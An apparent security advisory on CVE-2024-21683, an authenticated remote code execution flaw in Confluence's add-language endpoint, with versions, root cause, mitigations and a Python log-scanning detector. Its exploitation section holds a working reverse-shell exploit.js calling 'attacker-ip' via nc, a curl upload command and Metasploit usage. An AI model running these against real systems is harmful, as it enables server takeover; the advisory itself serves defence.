
Jun 12, 2025
CVE-2024-21683 – Authenticated RCE via “Add a New Language” in Atlassian Confluence
Critical RCE vulnerability (CVE-2024-21683) in Atlassian Confluence Data Center and Server (v5.2–8.9.0) allows authenticated users to execute arbitrary code via malicious code macros.
CVE-2024-21683 is a critical Remote Code Execution (RCE) vulnerability affecting self-hosted Atlassian Confluence Data Center and Server instances (versions 5.2 through 8.9.0). It allows authenticated attackers with permissions to add code macro languages to upload malicious scripts, resulting in arbitrary code execution on the host system.
- CVE ID: CVE-2024-21683
- Severity: High
- CVSS Score: 8.8 (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)
- EPSS Score: 93.98%
- Published: May 21, 2024
- Affected Versions: Confluence Data Center ≤8.9.0; Server ≤8.5.8 LTS / ≤7.19.21 LTS
- Fixed Versions: Data Center ≥ 8.9.1; Server ≥ 8.5.9 LTS or 7.19.22 LTS
The vulnerability stems from inadequate input validation in the “Add a new language” feature accessed via:
POST /admin/plugins/newcode/addlanguage.action
This endpoint expects a JavaScript language file, which is parsed by the RhinoLanguageParser. However, because the parser enables Java class access within the script, an attacker can inject malicious Java code (e.g., java.lang.Runtime.getRuntime().exec(…)) for RCE.
- Must have authenticated access to Confluence with privilege to add new macro languages
- Instance must be on a vulnerable version (≤8.9.0 DC or ≤8.5.8/7.19.21 LTS Server)
- Network access to the Confluence web interface
1. Create exploit.js:
new java.lang.ProcessBuilder["(java.lang.String[])"](
["bash","-c","nc attacker-ip 4444 -e /bin/sh"]
).start();
2. Send exploit:
curl -X POST http://target:8090/admin/plugins/newcode/addlanguage.action \
-F "atl_token=<CSRF_TOKEN>" \
-F "languageFile=@exploit.js;filename=exploit.js" \
-F "newLanguageName=evil"
Upon upload, the code executes, spawning a reverse shell. POC link: Github
Metasploit Module
Rapid7 released a Metasploit module exploit/multi/http/atlassian_confluence_rce_cve_2024_21683. Here’s the usage flow:
msf > use exploit/multi/http/atlassian_confluence_rce_cve_2024_21683
msf exploit(...) > set RHOSTS 10.10.10.5
msf exploit(...) > set admin_user admin
msf exploit(...) > set admin_pass admin
msf exploit(...) > set payload cmd/linux/http/x86/meterpreter_reverse_https
msf exploit(...) > exploit
If credentials are valid and privileges suffice, the module will upload and execute the malicious script, yielding a shell.
- Upgrade Confluence to fixed versions: DC ≥ 8.9.1; Server ≥ 8.5.9 LTS / 7.19.22 LTS
- Restrict “Add language” privileges to trusted admins
- Monitor logs for API calls to /admin/plugins/newcode/addlanguage.action
- Immediate WAF rules: block unauthorized POSTs to this endpoint
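The log-monitoring item above can be scripted. The following is an added example, not code from the OffSec post; it assumes access logs in the common combined format (adapt the regex to your proxy or Tomcat access-log pattern) and uses constructed sample lines.

```python
import re
from typing import Dict, List, Optional

# Combined-log style access line (assumed format; adjust for your proxy/Tomcat).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Endpoint abused in CVE-2024-21683 (from the advisory above).
ADD_LANGUAGE_PATH = "/admin/plugins/newcode/addlanguage.action"

# Constructed sample log lines: one admin GET (viewing the form), one admin POST
# (an upload), an unrelated page view, and a rejected unauthenticated POST.
SAMPLE_LOG = """\
10.0.0.7 - admin [21/May/2024:10:01:02 +0000] "GET /admin/plugins/newcode/addlanguage.action HTTP/1.1" 200 5120
10.0.0.7 - admin [21/May/2024:10:01:30 +0000] "POST /admin/plugins/newcode/addlanguage.action HTTP/1.1" 302 0
10.0.0.9 - jdoe [21/May/2024:10:02:00 +0000] "GET /display/DOCS/Home HTTP/1.1" 200 8000
10.0.0.11 - - [21/May/2024:10:03:00 +0000] "POST /admin/plugins/newcode/addlanguage.action?atl_token=x HTTP/1.1" 403 120
"""

def parse_line(line: str) -> Optional[Dict[str, str]]:
    """Parse one access-log line into its fields, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def find_language_uploads(lines) -> List[Dict[str, str]]:
    """Return every POST to the add-language endpoint, whatever the status code,
    so each one can be reconciled against an approved change (a 403 still shows
    someone tried)."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        path = rec["path"].split("?", 1)[0]  # ignore any query string
        if rec["method"] == "POST" and path == ADD_LANGUAGE_PATH:
            hits.append(rec)
    return hits

def summarize_by_user(hits: List[Dict[str, str]]) -> Dict[str, int]:
    """Count upload attempts per authenticated user ('-' = anonymous)."""
    counts: Dict[str, int] = {}
    for h in hits:
        counts[h["user"]] = counts.get(h["user"], 0) + 1
    return counts

if __name__ == "__main__":
    for h in find_language_uploads(SAMPLE_LOG.splitlines()):
        print(f"{h['ts']} user={h['user']} ip={h['ip']} status={h['status']}")
    print(summarize_by_user(find_language_uploads(SAMPLE_LOG.splitlines())))
```

Any hit not matching a planned language addition by a known admin warrants a look at the Confluence audit log and the uploaded language file.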